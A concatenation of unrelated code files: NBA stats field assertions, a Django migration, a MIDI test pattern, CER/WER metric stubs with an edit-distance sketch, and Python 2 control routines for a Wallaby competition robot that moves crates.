'GAME_SEQUENCE',
'GAME_ID',
'GAME_STATUS_ID',
'GAME_STATUS_TEXT',
'GAMECODE',
'HOME_TEAM_ID',
'VISITOR_TEAM_ID',
'SEASON',
'LIVE_PERIOD',
'LIVE_PC_TIME',
'NATL_TV_BROADCASTER_ABBREVIATION',
'HOME_TV_BROADCASTER_ABBREVIATION',
'AWAY_TV_BROADCASTER_ABBREVIATION',
'LIVE_PERIOD_TIME_BCAST',
'ARENA_NAME',
'WH_STATUS']
assert list(example_line.keys()) == ['GAME_DATE_EST',
'GAME_SEQUENCE',
'GAME_ID',
'TEAM_ID',
'TEAM_ABBREVIATION',
'TEAM_CITY_NAME',
'TEAM_NAME',
'TEAM_WINS_LOSSES',
'PTS_QTR1',
'PTS_QTR2',
'PTS_QTR3',
'PTS_QTR4',
'PTS_OT1',
'PTS_OT2',
'PTS_OT3',
'PTS_OT4',
'PTS_OT5',
'PTS_OT6',
'PTS_OT7',
'PTS_OT8',
'PTS_OT9',
'PTS_OT10',
'PTS',
'FG_PCT',
'FT_PCT',
'FG3_PCT',
'AST',
'REB',
'TOV']
assert list(example_series.keys()) == ['GAME_ID',
'HOME_TEAM_ID',
'VISITOR_TEAM_ID',
'GAME_DATE_EST',
'HOME_TEAM_WINS',
'HOME_TEAM_LOSSES',
'SERIES_LEADER']
assert list(example_last.keys()) == ['GAME_ID',
'LAST_GAME_ID',
'LAST_GAME_DATE_EST',
'LAST_GAME_HOME_TEAM_ID',
'LAST_GAME_HOME_TEAM_CITY',
'LAST_GAME_HOME_TEAM_NAME',
'LAST_GAME_HOME_TEAM_ABBREVIATION',
'LAST_GAME_HOME_TEAM_POINTS',
'LAST_GAME_VISITOR_TEAM_ID',
'LAST_GAME_VISITOR_TEAM_CITY',
'LAST_GAME_VISITOR_TEAM_NAME',
'LAST_GAME_VISITOR_TEAM_CITY1',
'LAST_GAME_VISITOR_TEAM_POINTS']
assert list(example_east.keys()) == ['TEAM_ID',
'LEAGUE_ID',
'SEASON_ID',
'STANDINGSDATE',
'CONFERENCE',
'TEAM',
'G',
'W',
'L',
'W_PCT',
'HOME_RECORD',
'ROAD_RECORD']
assert list(example_west.keys()) == ['TEAM_ID',
'LEAGUE_ID',
'SEASON_ID',
'STANDINGSDATE',
'CONFERENCE',
'TEAM',
'G',
'W',
'L',
'W_PCT',
'HOME_RECORD',
'ROAD_RECORD']
assert list(example_avail.keys()) == ['GAME_ID', 'PT_AVAILABLE']
assert list(example_lead.keys()) == ['GAME_ID',
'TEAM_ID',
'TEAM_CITY',
'TEAM_NICKNAME',
'TEAM_ABBREVIATION',
'PTS_PLAYER_ID',
'PTS_PLAYER_NAME',
'PTS',
'REB_PLAYER_ID',
'REB_PLAYER_NAME',
'REB',
'AST_PLAYER_ID',
'AST_PLAYER_NAME',
'AST']
assert list(example_tick.keys()) == ['GAME_ID', 'LEAG_TIX']
# === File: tools/migrations/0002_auto_20191218_1535.py (repo: IATI/new-website, license: MIT) ===
# Generated by Django 2.0.12 on 2019-12-18 15:35
from django.db import migrations
import wagtail.core.fields
class Migration(migrations.Migration):
dependencies = [
('tools', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='toolslistingpage',
name='highlight_content',
field=wagtail.core.fields.RichTextField(blank=True, help_text='Optional: content for the highlight panel displayed after featured tools'),
),
migrations.AlterField(
model_name='toolslistingpage',
name='highlight_content_en',
field=wagtail.core.fields.RichTextField(blank=True, help_text='Optional: content for the highlight panel displayed after featured tools', null=True),
),
migrations.AlterField(
model_name='toolslistingpage',
name='highlight_content_es',
field=wagtail.core.fields.RichTextField(blank=True, help_text='Optional: content for the highlight panel displayed after featured tools', null=True),
),
migrations.AlterField(
model_name='toolslistingpage',
name='highlight_content_fr',
field=wagtail.core.fields.RichTextField(blank=True, help_text='Optional: content for the highlight panel displayed after featured tools', null=True),
),
migrations.AlterField(
model_name='toolslistingpage',
name='highlight_content_pt',
field=wagtail.core.fields.RichTextField(blank=True, help_text='Optional: content for the highlight panel displayed after featured tools', null=True),
),
]
# === File: tests/mary_test.py (repo: m2march/python-midi, license: MIT) ===
import midi
MARY_MIDI = midi.Pattern(tracks=[[midi.TimeSignatureEvent(tick=0, data=[4, 2, 24, 8]),
midi.KeySignatureEvent(tick=0, data=[0, 0]),
midi.EndOfTrackEvent(tick=1, data=[])],
[midi.ControlChangeEvent(tick=0, channel=0, data=[91, 58]),
midi.ControlChangeEvent(tick=0, channel=0, data=[10, 69]),
midi.ControlChangeEvent(tick=0, channel=0, data=[0, 0]),
midi.ControlChangeEvent(tick=0, channel=0, data=[32, 0]),
midi.ProgramChangeEvent(tick=0, channel=0, data=[24]),
midi.NoteOnEvent(tick=0, channel=0, data=[64, 72]),
midi.NoteOnEvent(tick=0, channel=0, data=[55, 70]),
midi.NoteOnEvent(tick=231, channel=0, data=[64, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[62, 72]),
midi.NoteOnEvent(tick=231, channel=0, data=[62, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[60, 71]),
midi.NoteOnEvent(tick=231, channel=0, data=[60, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[62, 79]),
midi.NoteOnEvent(tick=206, channel=0, data=[55, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[62, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[64, 85]),
midi.NoteOnEvent(tick=0, channel=0, data=[55, 79]),
midi.NoteOnEvent(tick=231, channel=0, data=[64, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[64, 78]),
midi.NoteOnEvent(tick=231, channel=0, data=[64, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[64, 74]),
midi.NoteOnEvent(tick=462, channel=0, data=[55, 0]),
midi.NoteOnEvent(tick=0, channel=0, data=[64, 0]),
midi.NoteOnEvent(tick=50, channel=0, data=[62, 75]),
midi.NoteOnEvent(tick=0, channel=0, data=[55, 77]),
midi.NoteOnEvent(tick=231, channel=0, data=[62, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[62, 77]),
midi.NoteOnEvent(tick=231, channel=0, data=[62, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[62, 75]),
midi.NoteOnEvent(tick=462, channel=0, data=[55, 0]),
midi.NoteOnEvent(tick=0, channel=0, data=[62, 0]),
midi.NoteOnEvent(tick=50, channel=0, data=[64, 82]),
midi.NoteOnEvent(tick=0, channel=0, data=[55, 79]),
midi.NoteOnEvent(tick=231, channel=0, data=[64, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[67, 84]),
midi.NoteOnEvent(tick=231, channel=0, data=[67, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[67, 75]),
midi.NoteOnEvent(tick=462, channel=0, data=[55, 0]),
midi.NoteOnEvent(tick=0, channel=0, data=[67, 0]),
midi.NoteOnEvent(tick=50, channel=0, data=[64, 73]),
midi.NoteOnEvent(tick=0, channel=0, data=[55, 78]),
midi.NoteOnEvent(tick=231, channel=0, data=[64, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[62, 69]),
midi.NoteOnEvent(tick=231, channel=0, data=[62, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[60, 71]),
midi.NoteOnEvent(tick=231, channel=0, data=[60, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[62, 80]),
midi.NoteOnEvent(tick=206, channel=0, data=[55, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[62, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[64, 84]),
midi.NoteOnEvent(tick=0, channel=0, data=[55, 79]),
midi.NoteOnEvent(tick=231, channel=0, data=[64, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[64, 76]),
midi.NoteOnEvent(tick=231, channel=0, data=[64, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[64, 74]),
midi.NoteOnEvent(tick=231, channel=0, data=[64, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[64, 77]),
midi.NoteOnEvent(tick=206, channel=0, data=[55, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[64, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[62, 75]),
midi.NoteOnEvent(tick=0, channel=0, data=[55, 78]),
midi.NoteOnEvent(tick=231, channel=0, data=[62, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[62, 74]),
midi.NoteOnEvent(tick=231, channel=0, data=[62, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[64, 81]),
midi.NoteOnEvent(tick=231, channel=0, data=[64, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[62, 70]),
midi.NoteOnEvent(tick=206, channel=0, data=[55, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[62, 0]),
midi.NoteOnEvent(tick=25, channel=0, data=[60, 73]),
midi.NoteOnEvent(tick=0, channel=0, data=[52, 72]),
midi.NoteOnEvent(tick=974, channel=0, data=[60, 0]),
midi.NoteOnEvent(tick=0, channel=0, data=[52, 0]),
midi.EndOfTrackEvent(tick=1, data=[])]])
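The ``tick`` values above are delta times: each event is offset relative to the previous event in its track. A dependency-free sketch of recovering absolute tick positions (plain integers instead of ``midi`` event objects):

```python
def to_absolute_ticks(delta_ticks):
    """Running sum converting per-event delta ticks to absolute positions."""
    absolute, now = [], 0
    for delta in delta_ticks:
        now += delta
        absolute.append(now)
    return absolute


print(to_absolute_ticks([0, 231, 25, 231]))  # -> [0, 231, 256, 487]
```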
8184e3e37f2f386524fbce6702c996b4e91b6641 | 280 | py | Python | hw_asr/metric/utils.py | Misha24-10/asr_project_template | f5fbda4e215edb048c02d5e0c2ce1ba9c7804b02 | [
"MIT"
] | 1 | 2021-10-06T13:08:29.000Z | 2021-10-06T13:08:29.000Z | hw_asr/metric/utils.py | Misha24-10/asr_project_template | f5fbda4e215edb048c02d5e0c2ce1ba9c7804b02 | [
"MIT"
] | 1 | 2021-10-10T21:38:51.000Z | 2021-10-11T21:36:48.000Z | hw_asr/metric/utils.py | Misha24-10/asr_project_template | f5fbda4e215edb048c02d5e0c2ce1ba9c7804b02 | [
"MIT"
] | 11 | 2021-10-05T14:02:26.000Z | 2021-11-25T22:02:56.000Z | # Don't forget to support cases when target_text == ''
def calc_cer(target_text, predicted_text) -> float:
# TODO: your code here
    raise NotImplementedError()


def calc_wer(target_text, predicted_text) -> float:
# TODO: your code here
raise NotImplementedError()
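A possible Levenshtein-based implementation of these stubs (the `_edit_distance` helper name is illustrative, not part of the template); the `target_text == ''` case flagged in the comment above is handled explicitly:

```python
def _edit_distance(ref, hyp):
    # Wagner-Fischer DP over two sequences (characters for CER, words for WER).
    prev = list(range(len(hyp) + 1))
    for i, r in enumerate(ref, 1):
        cur = [i]
        for j, h in enumerate(hyp, 1):
            cur.append(min(prev[j] + 1,              # deletion
                           cur[j - 1] + 1,           # insertion
                           prev[j - 1] + (r != h)))  # substitution
        prev = cur
    return prev[-1]


def calc_cer(target_text, predicted_text) -> float:
    if not target_text:
        return 1.0 if predicted_text else 0.0
    return _edit_distance(target_text, predicted_text) / len(target_text)


def calc_wer(target_text, predicted_text) -> float:
    target_words = target_text.split()
    if not target_words:
        return 1.0 if predicted_text.split() else 0.0
    return _edit_distance(target_words, predicted_text.split()) / len(target_words)
```

Both metrics normalize by the target length, so an empty target with a non-empty prediction is reported as 1.0 rather than dividing by zero.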
| 25.454545 | 54 | 0.717857 | 37 | 280 | 5.243243 | 0.567568 | 0.154639 | 0.195876 | 0.237113 | 0.701031 | 0.701031 | 0.701031 | 0.701031 | 0.701031 | 0.701031 | 0 | 0 | 0.189286 | 280 | 10 | 55 | 28 | 0.854626 | 0.335714 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 0 | 1 | 0.5 | false | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
81a0d2e6eedb45e93311b8fe7f7920a27f122306 | 15,888 | py | Python | Legobot Code/actions.py | dotcomstar/Incredibots2018 | 0227c07626428d264dc3b05ecc08926f0e85d25b | [
"MIT"
] | 4 | 2018-07-30T05:30:46.000Z | 2019-06-07T04:40:56.000Z | Legobot Code/actions.py | dotcomstar/Incredibots2018 | 0227c07626428d264dc3b05ecc08926f0e85d25b | [
"MIT"
] | null | null | null | Legobot Code/actions.py | dotcomstar/Incredibots2018 | 0227c07626428d264dc3b05ecc08926f0e85d25b | [
"MIT"
] | 1 | 2018-07-30T05:20:28.000Z | 2018-07-30T05:20:28.000Z | # The bulk of commands should go here
from wallaby import *
import constants as c
import movement as m
import linefollow as f
import webcam as w
crate_zone = 30 # In place for ease of GitHub compilation.
botguy_zone = 30 # Ditto to above.
def get_crates():
print "Starting get_crates()"
print "Bot in starting box\n"
f.drive_through_two_lines_third()
f.right_point_turn_until_black()
f.lfollow_right_until_left_senses_black_smooth_amount(.5, c.BASE_LM_POWER, c.BASE_RM_POWER, int (.5 * c.BASE_LM_POWER), int (.5 * c.BASE_RM_POWER), 0, 0, False)
f.lfollow_right_until_left_senses_black_smooth_amount(.5, c.BASE_LM_POWER, c.BASE_RM_POWER, int (.7 * c.BASE_LM_POWER), int (.7 * c.BASE_RM_POWER), c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.lfollow_right_until_left_senses_black_smooth_amount(10, c.BASE_LM_POWER, c.BASE_RM_POWER, int (.9 * c.BASE_LM_POWER), int (.9 * c.BASE_RM_POWER), c.BASE_LM_POWER, c.BASE_RM_POWER, False)
print "Bot on center tee\n"
if c.IS_MAIN_BOT:
m.drive_tics(1007, c.BASE_LM_POWER, c.BASE_RM_POWER)
else: # Clone bot
m.drive_tics(1120, c.BASE_LM_POWER, c.BASE_RM_POWER)
f.right_point_turn_until_third_senses_white(10, 0, 0, False)
f.right_point_turn_until_third_senses_black(10, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER)
f.left_backwards_until_black()
f.right_backwards_until_black()
m.open_claw()
m.arm_slow(c.ARM_DOWN_POS)
m.claw_slow(c.CLAW_LESS_OPEN_POS)
m.backwards(1400)
print "Bot driving backwards to get crates\n"
m.close_claw()
print "\n\nFinished getting crates\n\n"
def approach_t():
print "Starting approach_t()"
f.right_point_turn_until_left_senses_black()
f.lfollow_left_inside_line_until_right_senses_black_smooth(15, 0, 0, False)
f.drive_through_line_left(2, c.BASE_LM_POWER, c.BASE_RM_POWER)
f.align_far()
print "The robot has reached the 'T'"
def put_crates_in_correct_zone():
approach_t()
w.check_zones_full()
deliver_first_crate()
deliver_second_crate()
def deliver_first_crate():
print "Starting first_crate_delivery()"
m.drive(500)
if crate_zone == c.LEFT:
print "Starting deliver_left()"
f.snap_to_line_left()
f.lfollow_left_until_right_senses_black_smooth(13, c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.lfollow_left_smooth(1, c.BASE_LM_POWER, c.BASE_RM_POWER)
f.right_point_turn_until_left_senses_white(10, 0, 0, False)
f.right_point_turn_until_left_senses_black(10, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER, False)
f.right_point_turn_until_left_senses_white(10, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER, False)
f.right_point_turn_until_left_senses_black(10, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER, False)
f.right_point_turn_until_left_senses_white(10, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER)
f.lfollow_left_until_right_senses_black_smooth(7)
if c.IS_MAIN_BOT:
f.right_point_turn_until_black_after(c.RIGHT_TURN_TIME, 0, 0, False)
f.right_point_turn_until_white(1, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER)
else: # Clone bot
f.right_point_turn_until_black_after(c.RIGHT_TURN_TIME)
elif crate_zone == c.MIDDLE:
print "Starting deliver_middle()"
f.snap_to_line_right()
f.lfollow_right_until_left_senses_black_smooth(13, c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.lfollow_right_smooth(1, c.BASE_LM_POWER, c.BASE_RM_POWER)
f.left_point_turn_until_right_senses_white(10, 0, 0, False)
f.left_point_turn_until_right_senses_black(10, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.left_point_turn_until_right_senses_white(10, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.left_point_turn_until_right_senses_black(10, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.left_point_turn_until_right_senses_white(10, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER)
f.lfollow_right_until_left_senses_black_smooth(7)
f.drive_until_white_left()
f.right_forwards_until_left_senses_black(10, 0, False)
f.right_forwards_until_left_senses_white(10, c.BASE_RM_POWER)
f.lfollow_left_inside_line_until_right_senses_black_smooth(10, 0, 0, False)
#f.left_forwards_until_black()
f.drive_until_white_right(2, c.BASE_LM_POWER, c.BASE_RM_POWER, False)
if c.IS_MAIN_BOT:
f.lfollow_left_inside_line_smooth(2.5, c.BASE_LM_POWER, c.BASE_RM_POWER)
else: # Clone bot
f.lfollow_left_inside_line_smooth(2.7, c.BASE_LM_POWER, c.BASE_RM_POWER)
m.turn_left()
f.align_in_zone_safely()
f.drive_through_line_third(10, 0, 0, False)
m.drive(700, c.BASE_LM_POWER, c.BASE_RM_POWER, c.BASE_LM_POWER, c.BASE_RM_POWER)
elif crate_zone == c.RIGHT:
print "Starting deliver_right()"
f.snap_to_line_right()
f.lfollow_right_until_left_senses_black_smooth(13, c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.lfollow_right_smooth(1, c.BASE_LM_POWER, c.BASE_RM_POWER)
f.left_point_turn_until_right_senses_white(10, 0, 0, False)
f.left_point_turn_until_right_senses_black(10, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.left_point_turn_until_right_senses_white(10, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.left_point_turn_until_right_senses_black(10, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.left_point_turn_until_right_senses_white(10, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER)
f.lfollow_right_until_left_senses_black_smooth(7)
f.left_point_turn_until_black_after(c.LEFT_TURN_TIME, 0, 0, False)
f.left_point_turn_until_white(1, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER)
m.backwards(200)
m.arm_slow(c.ARM_DOWN_POS)
msleep(300) # This pause helps keep the second crate from tipping over
m.claw_slow(c.CLAW_LARGE_OPEN_POS)
m.arm_slow(c.ARM_PUSH_CRATE_POS, 2, 1)
m.backwards(500)
print "First crate delivered\n\n"
def deliver_second_crate():
print "Starting second_crate_delivery()"
m.drive(250)
m.arm_slow(c.ARM_SECOND_CRATE_GRAB_POS, 2, 1)
m.backwards(100)
m.claw_slow(c.CLAW_SECOND_CRATE_GRAB_POS, 3, 1)
m.lift_arm(c.ARM_SECOND_CRATE_UP_POS)
m.wait(100)
if crate_zone == c.LEFT:
f.left_point_turn_until_black()
if c.IS_MAIN_BOT:
f.lfollow_left_smooth_amount(.7, c.BASE_LM_POWER, c.BASE_RM_POWER, int (.5 * c.BASE_LM_POWER), int (.5 * c.BASE_RM_POWER), 0, 0, False)
f.lfollow_left_smooth(.8, c.BASE_LM_POWER, c.BASE_RM_POWER)
else: # Clone bot
f.lfollow_left_smooth(1.5)
f.left_point_turn_until_right_senses_black()
f.lfollow_right_inside_line_until_left_senses_black_smooth_amount(1, c.BASE_LM_POWER, c.BASE_RM_POWER, int (.4 * c.BASE_LM_POWER), int (.4 * c.BASE_RM_POWER), 0, 0, False)
f.lfollow_right_inside_line_until_left_senses_black_smooth(10, 0, 0, False)
m.drive(150, c.BASE_LM_POWER, c.BASE_RM_POWER, c.BASE_LM_POWER, c.BASE_RM_POWER)
m.turn_right()
f.align_in_zone_safely()
elif crate_zone == c.MIDDLE:
f.right_point_turn_until_black()
f.lfollow_right_smooth(1.5)
f.right_point_turn_until_left_senses_black()
f.lfollow_left_inside_line_until_right_senses_black_smooth_amount(1, c.BASE_LM_POWER, c.BASE_RM_POWER, int (.4 * c.BASE_LM_POWER), int (.4 * c.BASE_RM_POWER), 0, 0, False)
f.lfollow_left_inside_line_until_right_senses_black_smooth(10, 0, 0, False)
m.drive(180, c.BASE_LM_POWER, c.BASE_RM_POWER, c.BASE_LM_POWER, c.BASE_RM_POWER)
f.right_point_turn_until_black(5, 0, 0, False)
f.right_point_turn_until_white(5, c.BASE_LM_POWER, -1* c.BASE_RM_POWER, False)
f.right_point_turn_until_black(5, c.BASE_LM_POWER, -1* c.BASE_RM_POWER, False)
f.right_point_turn_until_left_senses_black(5, c.BASE_LM_POWER, -1* c.BASE_RM_POWER, False)
m.turn_right(c.RIGHT_TURN_TIME, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER)
f.align_in_zone_safely()
elif crate_zone == c.RIGHT:
f.drive_until_white_third(10, 0, 0, False)
m.drive(300, c.BASE_LM_POWER, c.BASE_RM_POWER, c.BASE_LM_POWER, c.BASE_RM_POWER)
f.right_point_turn_until_black()
f.lfollow_right(3)
f.right_point_turn_until_left_senses_black()
f.lfollow_left_inside_line_until_right_senses_black_smooth_amount(2, c.BASE_LM_POWER, c.BASE_RM_POWER, int (.4 * c.BASE_LM_POWER), int (.4 * c.BASE_RM_POWER), 0, 0, False)
f.lfollow_left_inside_line_until_right_senses_black_smooth(10, c.BASE_LM_POWER, c.BASE_RM_POWER, False)
m.drive(200, c.BASE_LM_POWER, c.BASE_RM_POWER, c.BASE_LM_POWER, c.BASE_RM_POWER)
m.turn_left()
f.align_in_zone_safely()
f.drive_through_line_third(10, 0, 0, False)
m.drive(800, c.BASE_LM_POWER, c.BASE_RM_POWER, c.BASE_LM_POWER, c.BASE_RM_POWER)
m.arm_slow(c.ARM_SECOND_CRATE_DEPOSIT_POS, 2, 1)
m.claw_slow(c.CLAW_LARGE_OPEN_POS, 3, 1)
m.arm_slow(c.ARM_PUSH_CRATE_POS, 2, 1)
m.backwards(600)
msleep(10)
m.drive(200)
m.arm_slow(c.ARM_HIGH_POS, 2, 1)
print "Second crate delivered\n\n"
def get_botguy():
print "Starting get_botguy()"
if crate_zone == c.LEFT:
print "I'm in the left zone and going to botguy"
f.drive_through_line_left() # Bot on middle line
f.snap_to_line_left()
f.lfollow_left_until_right_senses_black_smooth(20, 0, 0, False)
f.drive_until_white(5, c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.lfollow_left_until_third_senses_black_smooth(5, c.BASE_LM_POWER, c.BASE_RM_POWER, False)
m.drive_tics(300, c.BASE_LM_POWER, c.BASE_RM_POWER)
f.left_point_turn_until_third_senses_white(5 * c.LEFT_TURN_TIME, 0, 0)
elif crate_zone == c.MIDDLE:
print "I'm in the middle zone and going to botguy"
m.turn_right()
m.drive(1500)
m.turn_left()
f.drive_through_line_left() # Bot on middle line
f.align_far()
f.snap_to_line_left()
f.lfollow_left_until_right_senses_black_smooth(20, 0, 0, False)
f.drive_until_white(5, c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.lfollow_left_until_third_senses_black_smooth(5, c.BASE_LM_POWER, c.BASE_RM_POWER, False)
m.drive_tics(300, c.BASE_LM_POWER, c.BASE_RM_POWER)
f.left_point_turn_until_third_senses_white(5 * c.LEFT_TURN_TIME, 0, 0)
elif crate_zone == c.RIGHT:
print "I'm in the right zone and going to botguy"
f.drive_through_line_left() # Bot on middle line
f.align_far()
f.snap_to_line_right()
f.lfollow_right_until_left_senses_black_smooth(20, 0, 0, False)
if c.IS_MAIN_BOT:
m.drive_tics(1007, c.BASE_LM_POWER, c.BASE_RM_POWER)
else: # Clone bot
m.drive_tics(1120, c.BASE_LM_POWER, c.BASE_RM_POWER)
f.right_point_turn_until_third_senses_white(5 * c.RIGHT_TURN_TIME / 1000, 0, 0, False)
f.right_point_turn_until_third_senses_black(10, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER)
    else:
        print "Error: unknown crate zone -- cannot navigate to botguy\n"
        exit(86)
f.left_backwards_until_black()
f.right_backwards_until_black()
m.open_claw(c.CLAW_BOTGUY_OPEN_POS)
m.arm_slow(c.ARM_DOWN_POS)
#f.right_point_turn_until_third_senses_black() # To do: Run more tests on this command
f.lfollow_backwards_smooth(4.5)
m.arm_slow(c.ARM_UP_POS)
m.backwards(490)
m.arm_slow(c.ARM_PUSH_CRATE_POS, 2, 1)
m.close_claw(c.CLAW_CLOSE_POS)
m.arm_slow(c.ARM_DOWN_POS)
m.backwards(100)
m.close_claw(c.BOTGUY_CLAW_CLOSE_POS)
print "Finished getting botguy\n\n"
def put_botguy_on_side():
print "Starting put_botguy_on_side()"
approach_t()
f.right_point_turn_until_third_senses_black(.2)
f.drive_until_white_third(5, 0, 0, False)
m.drive(300, c.BASE_LM_POWER, c.BASE_RM_POWER, c.BASE_LM_POWER, c.BASE_RM_POWER)
f.right_point_turn_until_left_senses_black(10, 0, 0, False)
f.right_point_turn_until_left_senses_white(10, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER, False)
f.right_point_turn_until_left_senses_black(10, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER)
def put_botguy_in_correct_zone():
approach_t()
f.right_point_turn_until_third_senses_black(.2)
print "Starting deliver_botguy()"
if botguy_zone == c.LEFT:
print "Starting deliver_left()"
f.snap_to_line_left()
f.lfollow_left_until_right_senses_black_smooth(13, c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.lfollow_left_smooth(1, c.BASE_LM_POWER, c.BASE_RM_POWER)
f.right_point_turn_until_left_senses_white(10, 0, 0, False)
f.right_point_turn_until_left_senses_black(10, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER, False)
f.right_point_turn_until_left_senses_white(10, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER, False)
f.right_point_turn_until_left_senses_black(10, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER, False)
f.right_point_turn_until_left_senses_white(10, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER)
f.lfollow_left_until_right_senses_black_smooth(7)
f.right_point_turn_until_black_after(c.RIGHT_TURN_TIME, 0, 0, False)
m.turn_right(int (c.RIGHT_TURN_TIME / 2), c.BASE_LM_POWER, -1 * c.BASE_RM_POWER, c.BASE_LM_POWER, -1 * c.BASE_RM_POWER)
m.claw_slow(c.CLAW_LARGE_OPEN_POS, 3, 1)
elif botguy_zone == c.MIDDLE:
print "Starting deliver_middle()"
f.drive_until_white_third(5, 0, 0, False)
m.drive(300, c.BASE_LM_POWER, c.BASE_RM_POWER, c.BASE_LM_POWER, c.BASE_RM_POWER)
f.left_point_turn_until_right_senses_black(10, 0, 0, False)
f.left_point_turn_until_right_senses_white(10, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.left_point_turn_until_right_senses_black(10, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER)
f.backwards_through_line_left()
f.align_close()
if False: # crate_zone == c.LEFT:
m.turn_right(int (c.RIGHT_TURN_TIME / 8))
m.backwards(900)
m.turn_right(int (c.RIGHT_TURN_TIME / 10))
elif False: # crate_zone == c.RIGHT:
m.turn_left(int (c.LEFT_TURN_TIME / 8))
m.backwards(900)
m.turn_left(int (c.LEFT_TURN_TIME / 20))
m.claw_slow(c.CLAW_LARGE_OPEN_POS, 3, 1)
m.backwards(1000)
elif botguy_zone == c.RIGHT:
print "Starting deliver_right()"
f.snap_to_line_right()
f.lfollow_right_until_left_senses_black_smooth(13, c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.lfollow_right_smooth(1, c.BASE_LM_POWER, c.BASE_RM_POWER)
f.left_point_turn_until_right_senses_white(10, 0, 0, False)
f.left_point_turn_until_right_senses_black(10, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.left_point_turn_until_right_senses_white(10, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.left_point_turn_until_right_senses_black(10, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, False)
f.left_point_turn_until_right_senses_white(10, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER)
f.lfollow_right_until_left_senses_black_smooth(7)
m.turn_left(c.LEFT_TURN_TIME, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, False)
m.turn_left(c.LEFT_TURN_TIME, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, False)
m.turn_left(int (c.LEFT_TURN_TIME / 2), -1 * c.BASE_LM_POWER, c.BASE_RM_POWER, -1 * c.BASE_LM_POWER, c.BASE_RM_POWER)
m.claw_slow(c.CLAW_LARGE_OPEN_POS, 3, 1)
m.arm_slow(c.ARM_PUSH_CRATE_POS, 3, 1)
m.backwards(300)
print "Botguy delivered\n\n"
